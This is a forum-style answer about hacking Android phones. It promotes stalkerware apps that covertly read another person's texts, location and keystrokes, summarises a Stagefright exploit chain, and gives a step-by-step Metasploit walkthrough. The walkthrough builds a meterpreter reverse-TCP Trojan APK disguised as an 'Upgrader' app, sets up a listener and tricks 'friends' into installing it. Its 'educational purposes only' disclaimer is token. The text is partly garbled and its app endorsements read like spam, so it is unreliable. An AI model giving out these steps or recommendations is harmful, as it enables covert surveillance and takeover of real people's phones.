By: AlexHales

Hacking a smartphone requires high qualifications and knowledge of hacking methods. Not everyone can do this unless you’re prepared to spend hours learning how to hack.

However, it would help if you tried an online tool that only allows you to use your phone number to hack text messages from other phones. I can recommend one to you: TextSpy. It’s the only tool I’ve tried that works immediately and without paying.

Enjoy your meal!

Here’s how the new Stagefright exploit works

The researchers describe the following process for successfully hijacking any vulnerable Android smartphone or tablet:

Step 1: Trick the victim into visiting a malicious web page containing a video file that causes Android’s Mediaserver software to crash, resetting its internal state.

Step 2: After the media server restarts, the JavaScript on the web page sends information about the victim’s device to the attacker’s server over the Internet.

Step 3: The attacker’s server then sends a custom-generated video file to the affected device, exploiting the Stagefright bug to reveal more information about the device’s internal state.

Step 4: This information is also sent back to the attacker’s server to make another video file with the malware’s payload embedded, which starts to play in the victim’s intelligence when Stagefright processes it Executed on the phone with all its privileges to spy on its owner.

Yes, you can track any Android phone through a spy app. If you are searching for the best spy app for android, consider the following points before buying any spy app.

  1. target device compatibility
  2. Features of spy app
  3. Easy to interface

Paid and free apps There are many android spy apps available in the market. If you are planning to buy apps, then I recommend you the best spy app for android, and it is TiSpy.

This application is also popular in child monitoring systems. Many parents are using this app to monitor their children. This application is compatible with android devices and easy to use. This android app provides real-time updates and informs you of each update on its dashboard. Here I am uploading a sample image of the dashboard.

Here I would like to list some of the features of this application below.

  1. You can track the text messages of the target device
  2. Location tracking and geofencing
  3. Track multimedia files.
  4. IM monitoring for WhatsApp, Facebook, Hike, Skype, Mail, and more
  5. Monitor internet usage
  6. Monitor and control applications and programs
  7. live
  8. Calendar event tracking
  9. Control apps and contacts
  10. health monitoring
  11. keylogger
  12. Manage calls

Tipsy provides the above functions. This application is straightforward to use.

How to track phone android phone tracker

Thanks, I hope my answer helped you choose the best spy app.

This is the Kali Linux method.

For educational purposes only

Step 1: Start Kali:

Open a terminal, and make a Trojan .apk

You can do this by typing:

msfpayload android/meterpreter/reverse_tcp LHOST= R> /root/Upgrader.apk (replace LHOST with your own IP)

You can also do this by typing in: Hacking android over WAN via public/external IP and port forwarding in LHOST from the Internet (if you have problems in the comments section, ask me about port forwarding)

Step 2: Open another terminal:

Open another terminal until the file is generated.

Load the Metasploit console by typing: msfconsole

Step 3: Set up the listener:

Once loaded (it takes time), load the multi-handler exploit by typing: use exploit /multi/handler

Set the (reverse) payload by typing: set payload android/meterpreter/reverse_tcp

set L host type: set LHOST (even if you are hacking on WAN, type your private/internal here IP instead of public/external IP)

Step 4: Take Advantage!

Last type: exploit start listener.

Copy the app you made (Upgrader.apk) from the root folder to the android phone.

Then use “Upload it to Dropbox or any sharing site (eg: )” to send it.

Then send the link the website gives you to your friends and exploit their phone (Only on LAN, but if you use the WAN method, the exploit can be used anywhere on the INTERNET)

Have the victim install the Upgrader app (because he thinks it’s to upgrade some features on the phone)

However, the “Allow app installation from unknown sources” option should be enabled (if not encouraged) from the android phone’s security settings to allow Install a Trojan horse program.

When he clicks “Open,”…

Step 5: BOOM!

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